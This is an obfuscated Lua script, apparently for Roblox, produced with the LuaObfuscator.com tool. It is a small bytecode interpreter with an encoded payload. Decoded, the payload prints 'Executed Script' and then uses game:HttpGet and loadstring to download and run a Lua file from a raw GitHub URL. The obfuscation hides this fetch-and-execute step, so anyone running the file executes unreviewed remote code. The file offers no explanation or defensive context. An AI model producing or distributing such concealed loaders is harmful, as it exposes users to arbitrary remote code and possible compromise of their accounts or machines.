--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v118=v5(v89,v19);v19=nil;return v118;else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v90-(v90%(569 -(367 + 201))) ;else local v91=(929 -(214 + 641 + 72))^(v32-(1 + 0)) ;return (((v31%(v91 + v91))>=v91) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + 2 ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -((75 -43) + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * (66806 -(226 + 1044))) + (v38 * (1114 -858)) + v37 ;end local function v24() local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==((442 -(416 + 26)) -0)) then v42=v23();v43=v23();v41=1;end if (v41==3) then if (v46==(0 -0)) then if (v45==(350 -(87 + 263))) then return v47 * (180 -(67 + 113)) ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(1506 + 541)) then return ((v45==(0 -0)) and (v47 * (((3042 -2089) -(802 + 150))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1855 -832) ) * (v44 + (v45/((2 + 0)^(1049 -(915 + 82))))) ;end if (v41==(5 -3)) then v46=v20(v43,6 + 7 + 8 ,31);v47=((v20(v43,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -0) ;v41=(1 -0) + 2 ;end if (v41==((439 -(145 + 293)) -0)) then v44=1;v45=(v20(v43,1 + 0 ,(1241 -(44 + 386)) -(368 + 423) ) * ((6 -4)^(50 -(10 + 8)))) + v42 ;v41=7 -(1491 -(998 + 488)) ;end end end local function v25(v48) local v49=0 + 0 ;local v50;local v51;while true do if (v49==2) then v51={};for v109=1, #v50 do v51[v109]=v2(v1(v3(v50,v109,v109)));end v49=3 + 0 ;end if (v49==(772 -(201 + 571))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=(2024 -(261 + 624)) -(116 + (1815 -793)) ;end if (v49==(12 -9)) then return v6(v51);end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -5 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do local v108=(function() return 0;end)();while true do if (v108==0) then if (v101==(2 -1)) then local v121=(function() return 0;end)();while true do if (v121==0) then while true do if (v92==(0 + 0)) then v93=(function() return v94();end)();if (v95(v93, #"!", #">")~=0) then else local v173=(function() return 0;end)();local v174=(function() return;end)();local v175=(function() return;end)();local v176=(function() return;end)();local v177=(function() return;end)();while true do if (v173~=(574 -(507 + 67))) then else local v183=(function() return 0;end)();while true do if (v183==(1750 -(1013 + 736))) then v173=(function() return 1 + 0 ;end)();break;end if (0==v183) then v174=(function() return 0;end)();v175=(function() return nil;end)();v183=(function() return 1;end)();end end end if (v173==(2 -1)) then local v184=(function() return 0;end)();while true do if (v184~=(3 -2)) then else v173=(function() return 869 -(550 + 317) ;end)();break;end if (v184==(0 -0)) then v176=(function() return nil;end)();v177=(function() return nil;end)();v184=(function() return 1;end)();end end end if ((2 -0)~=v173) then else while true do if (v174== #"-19") then if (v95(v176, #"asd", #"91(")== #",") then v177[ #"asd1"]=(function() return v96[v177[ #"0836"]];end)();end v97[v98]=(function() return v177;end)();break;end if ((5 -3)~=v174) then else local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if (v186==0) then v187=(function() return 285 -(134 + 151) ;end)();while true do if (v187~=0) then else if (v95(v176, #"<", #">")== #"}") then v177[1667 -(970 + 695) ]=(function() return v96[v177[3 -1 ]];end)();end if (v95(v176,1992 -(582 + 1408) ,6 -4 )== #"}") then v177[ #"19("]=(function() return v96[v177[ #"-19"]];end)();end v187=(function() return 1;end)();end if (v187==1) then v174=(function() return  #"xxx";end)();break;end end break;end end end if (v174~= #"\\") then else local v188=(function() return 0 -0 ;end)();local v189=(function() return;end)();while true do if (v188==(0 -0)) then v189=(function() return 0;end)();while true do if (v189==1) then v174=(function() return 1826 -(1195 + 629) ;end)();break;end if (v189==(0 -0)) then v177=(function() return {v99(),v99(),nil,nil};end)();if (v175==0) then local v195=(function() return 241 -(187 + 54) ;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 780 -(162 + 618) ;end)();while true do if (v196==0) then v177[ #"xnx"]=(function() return v99();end)();v177[ #"http"]=(function() return v99();end)();break;end end break;end end elseif (v175== #"}") then v177[ #"xxx"]=(function() return v100();end)();elseif (v175==2) then v177[ #"gha"]=(function() return v100() -(2^(12 + 4)) ;end)();elseif (v175== #"-19") then local v201=(function() return 0;end)();local v202=(function() return;end)();while true do if (v201==(0 + 0)) then v202=(function() return 0;end)();while true do if (0==v202) then v177[ #"-19"]=(function() return v100() -((3 -1)^16) ;end)();v177[ #".com"]=(function() return v99();end)();break;end end break;end end end v189=(function() return 1 -0 ;end)();end end break;end end end if (v174~=0) then else local v190=(function() return 0 + 0 ;end)();local v191=(function() return;end)();while true do if (v190==(1636 -(1373 + 263))) then v191=(function() return 0;end)();while true do if (v191~=(1000 -(451 + 549))) then else v175=(function() return v95(v93,1 + 1 , #"xxx");end)();v176=(function() return v95(v93, #"0313",9 -3 );end)();v191=(function() return 1 -0 ;end)();end if (v191==1) then v174=(function() return  #",";end)();break;end end break;end end end end break;end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end if (v101==0) then local v122=(function() return 1384 -(746 + 638) ;end)();while true do if ((1 + 0)~=v122) then else v101=(function() return 1;end)();break;end if (v122==0) then v92=(function() return 0 -0 ;end)();v93=(function() return nil;end)();v122=(function() return 1;end)();end end end break;end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 341 -(218 + 123) ;end)();while true do if (v105~=0) then else local v115=(function() return 1581 -(1535 + 46) ;end)();while true do if (v115~=(0 + 0)) then else v102[v103-#"\\" ]=(function() return v104();end)();return v102,v103,v104;end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #" ",v58 do local v68=(function() return 560 -(306 + 254) ;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (0==v68) then v69=(function() return 0 + 0 ;end)();v70=(function() return nil;end)();v68=(function() return 1 -0 ;end)();end if (v68==(1468 -(899 + 568))) then v71=(function() return nil;end)();while true do if (v69==(0 + 0)) then local v119=(function() return 0;end)();while true do if (v119~=(2 -1)) then else v69=(function() return 1;end)();break;end if (v119~=(603 -(268 + 335))) then else v70=(function() return v21();end)();v71=(function() return nil;end)();v119=(function() return 1;end)();end end end if ((291 -(60 + 230))==v69) then if (v70== #"]") then v71=(function() return v21()~=(572 -(426 + 146)) ;end)();elseif (v70==(1 + 1)) then v71=(function() return v24();end)();elseif (v70== #"-19") then v71=(function() return v25();end)();end v59[v67]=(function() return v71;end)();break;end end break;end end end v57[ #"nil"]=(function() return v21();end)();for v72= #"[",v23() do FlatIdent_51F42,Descriptor,v21,v20,v59,v54,v72,v22,v23=(function() return v52(FlatIdent_51F42,Descriptor,v21,v20,v59,v54,v72,v22,v23);end)();end for v73= #"<",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[(3009 -(1126 + 425)) -(282 + (1579 -(118 + 287))) ];local v66=v61[3];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=812 -(569 + 242) ;local v79= -(2 -1);local v80={};local v81={...};local v82=v12("#",...) -(1025 -(706 + (1246 -928))) ;local v83={};local v84={};for v106=1251 -(721 + 530) ,v82 do if ((2104>=1421) and (v106>=v76)) then v80[v106-v76 ]=v81[v106 + (1272 -(945 + 326)) ];else v84[v106]=v81[v106 + (2 -1) ];end end local v85=(v82-v76) + 1 + 0 ;local v86;local v87;while true do local v107=0;while true do if (v107==((1822 -(118 + 1003)) -(271 + 429))) then if ((1812<=3249) and (v87<=(4 + 0))) then if ((1750>=842) and (1623<=1957) and (v87<=(1501 -(1408 + 92)))) then if ((4372>1850) and (v87==(1086 -(461 + 625)))) then local v124=1288 -(993 + 295) ;local v125;while true do if (v124==(0 + 0)) then v125=v86[1173 -((1223 -805) + 753) ];v84[v125]=v84[v125](v13(v84,v125 + 1 + 0 ,v79));break;end end else local v126;local v127,v128;local v129;local v130;v84[v86[379 -(142 + 235) ]]=v86[1 + 2 ];v78=v78 + 1 + 0 ;v86=v74[v78];v130=v86[1 + 1 ];v84[v130](v84[v130 + (530 -(406 + 123)) ]);v78=v78 + (1770 -((7934 -6185) + 20)) ;v86=v74[v78];v84[v86[1 + 0 + 1 ]]=v63[v86[1325 -(1249 + 73) ]];v78=v78 + 1 ;v86=v74[v78];v84[v86[(978 -(553 + 424)) + 1 ]]=v63[v86[1148 -(466 + 679) ]];v78=v78 + (2 -1) ;v86=v74[v78];v130=v86[2];v129=v84[v86[8 -5 ]];v84[v130 + (1 -0) ]=v129;v84[v130]=v129[v86[1904 -(106 + 1794) ]];v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[1 + 1 ]]=v86[8 -(5 + 0) ];v78=v78 + 1 ;v86=v74[v78];v130=v86[5 -3 ];v127,v128=v77(v84[v130](v13(v84,v130 + (115 -(4 + 110)) ,v86[587 -(57 + 527) ])));v79=(v128 + v130) -1 ;v126=1427 -(41 + 0 + 1386) ;for v153=v130,v79 do v126=v126 + ((61 + 43) -(17 + 86)) ;v84[v153]=v127[v126];end v78=v78 + 1 + 0 + 0 ;v86=v74[v78];v130=v86[3 -1 ];v84[v130]=v84[v130](v13(v84,v130 + (2 -1) ,v79));v78=v78 + (167 -(122 + 44)) ;v86=v74[v78];v84[v86[2]]();v78=v78 + (1 -0) ;v86=v74[v78];v78=v86[9 -(4 + 2) ];end elseif (v87<=2) then v84[v86[2]]();elseif (v87>(3 + 0)) then v78=v86[1 + 2 ];elseif ((4412==4412) and (v84[v86[3 -1 ]]==v86[69 -(30 + 35) ])) then v78=v78 + 1 + 0 ;else v78=v86[1260 -(1043 + (463 -249)) ];end elseif (v87<=(26 -19)) then if (v87<=((3390 -2173) -(323 + 889))) then v84[v86[5 -(6 -3) ]]=v86[583 -(361 + 219) ];elseif (v87>6) then v84[v86[(94 + 228) -(53 + 267) ]]=v63[v86[1 + (9 -7) ]];else do return;end end elseif (v87<=8) then local v151=753 -(239 + 514) ;local v152;while true do if (v151==(413 -(15 + 398))) then v152=v86[984 -(18 + 964) ];v84[v152](v84[v152 + ((2 + 1) -2) ]);break;end end elseif ((232<821) and (v87==(6 + 3))) then local v159=v86[2 + 0 ];local v160,v161=v77(v84[v159](v13(v84,v159 + 1 ,v86[853 -(20 + 830) ])));v79=(v161 + v159) -1 ;local v162=0 + 0 ;for v169=v159,v79 do v162=v162 + 1 ;v84[v169]=v160[v162];end else local v163=126 -(116 + 10) ;local v164;local v165;while true do if (v163==(0 + 0)) then v164=v86[740 -(542 + 196) ];v165=v84[v86[6 -3 ]];v163=1 + 0 ;end if ((518<902) and (v163==1)) then v84[v164 + 1 + 0 ]=v165;v84[v164]=v165[v86[4]];break;end end end v78=v78 + 1 + 0 ;break;end if ((2994>858) and (v107==(0 -(1329 -(797 + 532))))) then v86=v74[v78];v87=v86[(2 + 0) -1 ];v107=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073O00028O0003053O007072696E74030F3O00457865637574656420536372697074030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5572616E69426F792F3467613367717933342F6D61696E2F326773786E336E612E6C756100103O0012053O00013O0026033O000100010001002O043O00010001001207000100023O001201000200036O00010002000100122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000F0001002O043O000100012O00063O00017O00",v9(),...);
